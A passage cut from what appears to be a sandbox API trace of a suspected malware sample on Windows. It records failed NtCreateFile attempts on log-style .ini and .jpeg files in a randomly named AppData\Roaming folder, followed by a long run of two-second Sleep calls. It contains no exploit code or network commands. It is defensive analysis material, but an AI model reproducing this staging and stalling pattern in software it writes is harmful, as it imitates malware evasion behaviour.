"c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.546] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0219.546] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a7c0) returned 1 [0219.546] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.546] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.547] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a730) returned 1 [0219.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.547] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.547] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0219.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.547] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.547] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.547] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89ad0) returned 1 [0219.547] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.547] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.548] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.548] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f88f00) returned 1 [0219.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.548] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.548] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.548] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0219.548] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.548] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.550] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.550] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f890b0) returned 1 [0219.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.550] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.550] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.550] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a970) returned 1 [0219.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.550] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.550] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.550] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f8a2b0) returned 1 [0219.550] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.550] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.551] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0219.551] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f89800) returned 1 [0219.551] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0219.551] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0219.551] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0219.551] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0x9f899b0) returned 1 [0219.551] Sleep (dwMilliseconds=0x7d0) [0219.554] Sleep (dwMilliseconds=0x7d0) [0219.555] Sleep (dwMilliseconds=0x7d0) [0219.557] Sleep (dwMilliseconds=0x7d0) [0219.558] Sleep (dwMilliseconds=0x7d0) [0219.561] Sleep (dwMilliseconds=0x7d0) [0219.563] Sleep (dwMilliseconds=0x7d0) [0219.565] Sleep (dwMilliseconds=0x7d0) [0219.566] Sleep (dwMilliseconds=0x7d0) [0219.568] Sleep (dwMilliseconds=0x7d0) [0219.569] Sleep (dwMilliseconds=0x7d0) [0219.572] Sleep (dwMilliseconds=0x7d0) [0219.574] Sleep (dwMilliseconds=0x7d0) [0219.576] Sleep (dwMilliseconds=0x7d0) [0219.577] Sleep (dwMilliseconds=0x7d0) [0219.579] Sleep (dwMilliseconds=0x7d0) [0219.582] Sleep (dwMilliseconds=0x7d0) [0219.585] Sleep (dwMilliseconds=0x7d0) [0219.587] Sleep (dwMilliseconds=0x7d0) [0219.588] Sleep (dwMilliseconds=0x7d0) [0219.589] Sleep (dwMilliseconds=0x7d0) [0219.593] Sleep (dwMilliseconds=0x7d0) [0219.595] Sleep (dwMilliseconds=0x7d0) [0219.597] Sleep (dwMilliseconds=0x7d0) [0219.598] Sleep (dwMilliseconds=0x7d0) [0219.600] Sleep (dwMilliseconds=0x7d0) [0219.602] Sleep (dwMilliseconds=0x7d0) [0219.603] Sleep (dwMilliseconds=0x7d0) [0219.605] Sleep (dwMilliseconds=0x7d0) [0219.607] Sleep (dwMilliseconds=0x7d0) [0219.608] Sleep (dwMilliseconds=0x7d0) [0219.610] Sleep (dwMilliseconds=0x7d0) [0219.611] Sleep (dwMilliseconds=0x7d0) [0219.613] Sleep (dwMilliseconds=0x7d0) [0219.616] Sleep (dwMilliseconds=0x7d0) [0219.617] Sleep (dwMilliseconds=0x7d0) [0219.619] Sleep (dwMilliseconds=0x7d0) [0219.620] Sleep (dwMilliseconds=0x7d0) [0219.622] Sleep (dwMilliseconds=0x7d0) [0219.623] Sleep (dwMilliseconds=0x7d0) [0219.625] Sleep (dwMilliseconds=0x7d0) [0219.627] Sleep (dwMilliseconds=0x7d0) [0219.628] Sleep (dwMilliseconds=0x7d0) [0219.630] Sleep (dwMilliseconds=0x7d0) [0219.631] Sleep (dwMilliseconds=0x7d0) [0219.633] Sleep (dwMilliseconds=0x7d0) [0219.634] Sleep (dwMilliseconds=0x7d0) [0219.636] Sleep (dwMilliseconds=0x7d0) [0219.638] Sleep (dwMilliseconds=0x7d0) [0219.640] Sleep (dwMilliseconds=0x7d0) [0219.641] Sleep (dwMilliseconds=0x7d0) [0219.643] Sleep (dwMilliseconds=0x7d0) [0219.644] Sleep (dwMilliseconds=0x7d0) [0219.646] Sleep (dwMilliseconds=0x7d0) [0219.649] Sleep (dwMilliseconds=0x7d0) [0219.652] Sleep (dwMilliseconds=0x7d0) [0219.654] Sleep (dwMilliseconds=0x7d0) [0219.655] Sleep (dwMilliseconds=0x7d0) [0219.657] Sleep (dwMilliseconds=0x7d0) [0219.660] Sleep (dwMilliseconds=0x7d0) [0219.661] Sleep (dwMilliseconds=0x7d0) [0219.663] Sleep (dwMilliseconds=0x7d0) [0219.664] Sleep (dwMilliseconds=0x7d0) [0219.666] Sleep (dwMilliseconds=0x7d0) [0219.667] Sleep (dwMilliseconds=0x7d0) [0219.669] Sleep (dwMilliseconds=0x7d0) [0219.671] Sleep (dwMilliseconds=0x7d0) [0219.673] Sleep (dwMilliseconds=0x7d0) [0219.674] Sleep (dwMilliseconds=0x7d0) [0219.676] Sleep (dwMilliseconds=0x7d0) [0219.677] Sleep (dwMilliseconds=0x7d0) [0219.679] Sleep (dwMilliseconds=0x7d0) [0219.681] Sleep (dwMilliseconds=0x7d0) [0219.684] Sleep (dwMilliseconds=0x7d0) [0219.686] Sleep (dwMilliseconds=0x7d0) [0219.688] Sleep (dwMilliseconds=0x7d0) [0219.689] Sleep (dwMilliseconds=0x7d0) [0219.691] Sleep (dwMilliseconds=0x7d0) [0219.694] Sleep (dwMilliseconds=0x7d0) [0219.695] Sleep (dwMilliseconds=0x7d0) [0219.697] Sleep (dwMilliseconds=0x7d0) [0219.700] Sleep (dwMilliseconds=0x7d0) [0219.702] Sleep (dwMilliseconds=0x7d0) [0219.704] Sleep (dwMilliseconds=0x7d0) [0219.708] Sleep (dwMilliseconds=0x7d0) [0219.710] Sleep (dwMilliseconds=0x7d0) [0219.711] Sleep (dwMilliseconds=0x7d0) [0219.714] Sleep (dwMilliseconds=0x7d0) [0219.717] Sleep (dwMilliseconds=0x7d0) [0219.719] Sleep (dwMilliseconds=0x7d0) [0219.720] Sleep (dwMilliseconds=0x7d0) [0219.722] Sleep (dwMilliseconds=0x7d0) [0219.724] Sleep (dwMilliseconds=0x7d0) [0219.727] Sleep (dwMilliseconds=0x7d0) [0219.728] Sleep (dwMilliseconds=0x7d0) [0219.730] Sleep (dwMilliseconds=0x7d0) [0219.731] Sleep (dwMilliseconds=0x7d0) [0219.733] Sleep (dwMilliseconds=0x7d0) [0219.734] Sleep (dwMilliseconds=0x7d0) [0219.736] Sleep (dwMilliseconds=0x7d0) [0219.739] Sleep (dwMilliseconds=0x7d0) [0219.740] Sleep (dwMilliseconds=0x7d0) [0219.742] Sleep (dwMilliseconds=0x7d0) [0219.743] Sleep (dwMilliseconds=0x7d0) [0219.745] Sleep (dwMilliseconds=0x7d0) [0219.748] Sleep (dwMilliseconds=0x7d0) [0219.749] Sleep (dwMilliseconds=0x7d0) [0219.751] Sleep (dwMilliseconds=0x7d0) [0219.752] Sleep (dwMilliseconds=0x7d0) [0219.754] Sleep (dwMilliseconds=0x7d0) [0219.755] Sleep (dwMilliseconds=0x7d0) [0219.757] Sleep (dwMilliseconds=0x7d0) [0219.759] Sleep (dwMilliseconds=0x7d0) [0219.761] Sleep (dwMilliseconds=0x7d0) [0219.762] Sleep (dwMilliseconds=0x7d0) [0219.764] Sleep (dwMilliseconds=0x7d0) [0219.765] Sleep (dwMilliseconds=0x7d0) [0219.767] Sleep (dwMilliseconds=0x7d0) [0219.768] Sleep (dwMilliseconds=0x7d0) [0219.770] Sleep (dwMilliseconds=0x7d0) [0219.771] Sleep (dwMilliseconds=0x7d0) [0219.773] Sleep (dwMilliseconds=0x7d0) [0219.774] Sleep (dwMilliseconds=0x7d0) [0219.776] Sleep (dwMilliseconds=0x7d0) [0219.777] Sleep (dwMilliseconds=0x7d0) [0219.779] Sleep (dwMilliseconds=0x7d0) [0219.781] Sleep (dwMilliseconds=0x7d0) [0219.784] Sleep (dwMilliseconds=0x7d0) [0219.785] Sleep (dwMilliseconds=0x7d0) [0219.787] Sleep (dwMilliseconds=0x7d0) [0219.788] Sleep (dwMilliseconds=0x7d0) [0219.790] Sleep (dwMilliseconds=0x7d0) [0219.792] Sleep (dwMilliseconds=0x7d0) [0219.794] Sleep (dwMilliseconds=0x7d0) [0219.796] Sleep (dwMilliseconds=0x7d0) [0219.797] Sleep (dwMilliseconds=0x7d0) [0219.799] Sleep (dwMilliseconds=0x7d0) [0219.800] Sleep (dwMilliseconds=0x7d0) [0219.803] Sleep (dwMilliseconds=0x7d0) [0219.809] Sleep (dwMilliseconds=0x7d0) [0219.811] Sleep (dwMilliseconds=0x7d0) [0219.812] Sleep (dwMilliseconds=0x7d0) [0219.814] Sleep (dwMilliseconds=0x7d0) [0219.815] Sleep (dwMilliseconds=0x7d0) [0219.817] Sleep (dwMilliseconds=0x7d0) [0219.818] Sleep (dwMilliseconds=0x7d0) [0219.820] Sleep (dwMilliseconds=0x7d0) [0219.821] Sleep (dwMilliseconds=0x7d0) [0219.823] Sleep (dwMilliseconds=0x7d0) [0219.824] Sleep (dwMilliseconds=0x7d0) [0219.826] Sleep (dwMilliseconds=0x7d0) [0219.828] Sleep (dwMilliseconds=0x7d0) [0219.829] Sleep (dwMilliseconds=0x7d0) [0219.831] Sleep (dwMilliseconds=0x7d0) [0219.832] Sleep (dwMilliseconds=0x7d0) [0219.834] Sleep (dwMilliseconds=0x7d0) [0219.835] Sleep (dwMilliseconds=0x7d0) [0219.837] Sleep (dwMilliseconds=0x7d0) [0219.839] Sleep (dwMilliseconds=0x7d0) [0219.840] Sleep (dwMilliseconds=0x7d0) [0219.842] Sleep (dwMilliseconds=0x7d0) [0219.843] Sleep (dwMilliseconds=0x7d0) [0219.845] Sleep (dwMilliseconds=0x7d0) [0219.847] Sleep (dwMilliseconds=0x7d0) [0219.849] Sleep (dwMilliseconds=0x7d0) [0219.850] Sleep (dwMilliseconds=0x7d0) [0219.852] Sleep (dwMilliseconds=0x7d0) [0219.853] Sleep (dwMilliseconds=0x7d0) [0219.855] Sleep (dwMilliseconds=0x7d0) [0219.856] Sleep (dwMilliseconds=0x7d0) [0219.858] Sleep (dwMilliseconds=0x7d0) [0219.859] Sleep (dwMilliseconds=0x7d0) [0219.861] Sleep (dwMilliseconds=0x7d0) [0219.862] Sleep (dwMilliseconds=0x7d0) [0219.864] Sleep (dwMilliseconds=0x7d0) [0219.865] Sleep (dwMilliseconds=0x7d0) [0219.867] Sleep (dwMilliseconds=0x7d0) [0219.869] Sleep (dwMilliseconds=0x7d0) [0219.871] Sleep (dwMilliseconds=0x7d0) [0219.873] Sleep (dwMilliseconds=0x7d0) [0219.874] Sleep (dwMilliseconds=0x7d0) [0219.876] Sleep (dwMilliseconds=0x7d0) [0219.877] Sleep (dwMilliseconds=0x7d0) [0219.882] Sleep (dwMilliseconds=0x7d0) [0219.883] Sleep (dwMilliseconds=0x7d0) [0219.885] Sleep (dwMilliseconds=0x7d0) [0219.886] Sleep (dwMilliseconds=0x7d0) [0219.888] Sleep (dwMilliseconds=0x7d0) [0219.892] Sleep (dwMilliseconds=0x7d0) [0219.893] Sleep (dwMilliseconds=0x7d0) [0219.895] Sleep (dwMilliseconds=0x7d0) [0219.896] Sleep (dwMilliseconds=0x7d0) [0219.898] Sleep (dwMilliseconds=0x7d0) [0219.899] Sleep (dwMilliseconds=0x7d0) [0219.901] Sleep (dwMilliseconds=0x7d0) [0219.902] Sleep (dwMilliseconds=0x7d0) [0219.904] Sleep (dwMilliseconds=0x7d0) [0219.907] Sleep (dwMilliseconds=0x7d0) [0219.908] Sleep (dwMilliseconds=0x7d0) [0219.910] Sleep (dwMilliseconds=0x7d0) [0219.915] Sleep (dwMilliseconds=0x7d0) [0219.916] Sleep (dwMilliseconds=0x7d0) [0219.918] Sleep (dwMilliseconds=0x7d0) [0219.919] Sleep (dwMilliseconds=0x7d0) [0219.925] Sleep (dwMilliseconds=0x7d0) [0219.926] Sleep (dwMilliseconds=0x7d0) [0219.928] Sleep (dwMilliseconds=0x7d0) [0219.929] Sleep (dwMilliseconds=0x7d0) [0219.931] Sleep (dwMilliseconds=0x7d0) [0219.932] Sleep (dwMilliseconds=0x7d0) [0219.934] Sleep (dwMilliseconds=0x7d0) [0219.935] Sleep (dwMilliseconds=0x7d0) [0219.937] Sleep (dwMilliseconds=0x7d0) [0219.938] Sleep (dwMilliseconds=0x7d0) [0219.940] Sleep (dwMilliseconds=0x7d0) [0219.941] Sleep (dwMilliseconds=0x7d0) [0219.943] Sleep (dwMilliseconds=0x7d0) [0219.948] Sleep (dwMilliseconds=0x7d0) [0219.950] Sleep (dwMilliseconds=0x7d0) [0219.951] Sleep (dwMilliseconds=0x7d0) [0219.953] Sleep (dwMilliseconds=0x7d0) [0219.954] Sleep (dwMilliseconds=0x7d0) [0219.959] Sleep (dwMilliseconds=0x7d0) [0219.960] Sleep (dwMilliseconds=0x7d0) [0219.962] Sleep (dwMilliseconds=0x7d0) [0219.963] Sleep (dwMilliseconds=0x7d0) [0219.965] Sleep (dwMilliseconds=0x7d0) [0219.969] Sleep (dwMilliseconds=0x7d0) [0219.970] Sleep (dwMilliseconds=0x7d0) [0219.972] Sleep (dwMilliseconds=0x7d0) [0219.973] Sleep (dwMilliseconds=0x7d0) [0219.975] Sleep (dwMilliseconds=0x7d0) [0219.976] Sleep (dwMilliseconds=0x7d0) [0219.978] Sleep (dwMilliseconds=0x7d0) [0219.979] Sleep (dwMilliseconds=0x7d0) [0219.981] Sleep (dwMilliseconds=0x7d0) [0219.982] Sleep (dwMilliseconds=0x7d0) [0219.984] Sleep (dwMilliseconds=0x7d0) [0219.986] Sleep (dwMilliseconds=0x7d0) [0219.991] Sleep (dwMilliseconds=0x7d0) [0219.993] Sleep (dwMilliseconds=0x7d0) [0219.994] Sleep (dwMilliseconds=0x7d0) [0219.996] Sleep (dwMilliseconds=0x7d0) [0219.997] Sleep (dwMilliseconds=0x7d0) [0220.037] Sleep (dwMilliseconds=0x7d0) [0220.039] Sleep (dwMilliseconds=0x7d0) [0220.040] Sleep (dwMilliseconds=0x7d0) [0220.045] Sleep (dwMilliseconds=0x7d0) [0220.046] Sleep (dwMilliseconds=0x7d0) [0220.048] Sleep (dwMilliseconds=0x7d0) [0220.049] Sleep (dwMilliseconds=0x7d0) [0220.051] Sleep (dwMilliseconds=0x7d0) [0220.052] Sleep (dwMilliseconds=0x7d0) [0220.055] Sleep (dwMilliseconds=0x7d0) [0220.056] Sleep (dwMilliseconds=0x7d0) [0220.058] Sleep (dwMilliseconds=0x7d0) [0220.060] Sleep (dwMilliseconds=0x7d0) [0220.061] Sleep (dwMilliseconds=0x7d0) [0220.062] Sleep (dwMilliseconds=0x7d0) [0220.064] Sleep (dwMilliseconds=0x7d0) [0220.065] Sleep (dwMilliseconds=0x7d0) [0220.067] Sleep (dwMilliseconds=0x7d0) [0220.068] Sleep (dwMilliseconds=0x7d0) [0220.070] Sleep (dwMilliseconds=0x7d0) [0220.071] Sleep (dwMilliseconds=0x7d0) [0220.073] Sleep (dwMilliseconds=0x7d0) [0220.074] Sleep (dwMilliseconds=0x7d0) [0220.078] Sleep (dwMilliseconds=0x7d0) [0220.079] Sleep 